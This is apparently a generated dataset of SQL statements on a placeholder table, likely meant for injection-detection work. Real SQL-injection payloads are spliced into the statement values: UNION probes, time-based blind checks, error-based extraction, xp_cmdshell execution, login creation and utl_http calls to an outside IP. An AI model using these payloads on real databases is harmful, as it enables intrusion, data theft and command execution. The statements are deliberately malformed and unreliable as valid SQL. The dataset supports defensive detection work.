SELECT * FROM `tab` WHERE `col1` = 'j' LIMIT "%')));
UPDATE `tab` SET `col2` = 1 WHERE `col2` >= "';
UPDATE `tab` SET `col1` = 2 WHERE `col2` < "' select name from syscolumns where id = (select id from sysobjects where name = tablename')--" OR `col1` LIKE "%'r'%";
SELECT PG_SLEEP(5) AND ((('%'='";
INSERT INTO `tab` ( `col3`, `col1` ) VALUES ( 'v', 'a' );
 if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' --" OR `col3` = 'k';
DELETE FROM `tab` WHERE `col3` LIKE "%'u'%";
DELETE FROM `tab` WHERE `col2` LIKE '%'w'%' LIMIT '"));
SELECT `col2` FROM `tab` WHERE `col3` >= '));
SELECT (CASE WHEN (1513=1513) THEN 1513 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL--' LIMIT ')) OR NOT 4439=2168-- oxFC';
SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3--';
UPDATE `tab` SET `col3` = 9 WHERE `col1` >= "%' OR 9862=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)--" AND `col3` LIKE '%'k'%';
INSERT INTO `tab` ( `col3`, `col3` ) VALUES ( "1') OR 3023=3023#", '%" AND 9426=9298-- Oypf' );
SELECT `col1`, `col2`, `col1`, `col3` FROM `tab` WHERE `col2` < "' IN BOOLEAN MODE);
INSERT INTO `tab` ( `col2` ) VALUES ( '2")) AS rSPD WHERE 8757=8757 UNION ALL SELECT 8757,8757,8757,8757,8757,8757,8757,8757,8757-- sria' );
DELETE FROM `tab` WHERE `col1` = "exec sp_addlogin 'name' , 'password'" AND `col3` >= '7 WHERE 4146=4146 OR 1 GROUP BY CONCAT(0x717a706271,(SELECT (CASE WHEN (8312=8312) THEN 1 ELSE 0 END)),0x7178767171,FLOOR(RAND(0)*2)) HAVING MIN(0)#';
DELETE FROM `tab` WHERE `col3` < "\'; desc users; --" AND `col2` LIKE "%'w'%" OR `col2` LIKE "%'n'%" OR `col3` = '%" AND 7030=CONCAT(CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113),(SELECT (CASE WHEN (7030=7030) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(120)+CHAR(118)+CHAR(113)+CHAR(113)) AND "%"="' LIMIT "`) WHERE 7962=7962;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep(5)-- YoLk";
DELETE FROM `tab` WHERE `col1` < '1';
DELETE FROM `tab` WHERE `col1` = '"))) OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x717a706271,(SELECT (ELT(3213=3213,1))),0x7178767171)) USING utf8))) AND ((("Zepv"="Zepv';
UPDATE `tab` SET `col1` = 9 WHERE `col2` = 'o' OR `col3` LIKE "%'s'%";
UPDATE `tab` SET `col1` = 6 WHERE `col1` >= '3")) AS OmMl WHERE 5120=5120 OR 9327=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(122)||CHR(112)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (9327=9327) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(120)||CHR(118)||CHR(113)||CHR(113))-- xiex';
DELETE FROM `tab` WHERE `col1` LIKE '%'d'%' AND `col2` = 'i';
SELECT `col1`, `col3` FROM `tab` WHERE `col3` >= '` WHERE 1024=1024 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#' LIMIT "') AS VcyA WHERE 3286=3286;
INSERT INTO `tab` ( `col1` ) VALUES ( "';
SELECT (CASE WHEN (5247=9335) THEN 1 ELSE 5247*(SELECT 5247 UNION ALL SELECT 9335) END)--";
 exec master..xp_cmdshell 'ping 172.10.1.255'--" );
SELECT `col2` FROM `tab` WHERE `col1` = '" OR NOT 7471=7471#';
DELETE FROM `tab` WHERE `col2` < "'||utl_http.request('httP://192.168.1.1/')||'" OR `col1` >= "1 and user_name() = 'dbo'";
DELETE FROM `tab` WHERE `col1` = 's';
UPDATE `tab` SET `col3` = 8 WHERE `col2` LIKE '%'q'%' OR `col1` = "')));
INSERT INTO `tab` ( `col3`, `col1` ) VALUES ( 'n', '6%"))) ORDER BY 1-- QRYq' );
SELECT `col3`, `col1` FROM `tab` WHERE `col3` >= "create user name identified by 'pass123'" LIMIT "' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i";
SELECT * FROM `tab` WHERE `col2` >= '" WHERE 5628=5628;
CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY(CHAR(65)||CHAR(69)||CHAR(83),NULL),0),500000000),NULL)--' LIMIT "';
DELETE FROM `tab` WHERE `col1` = 'e' LIMIT "';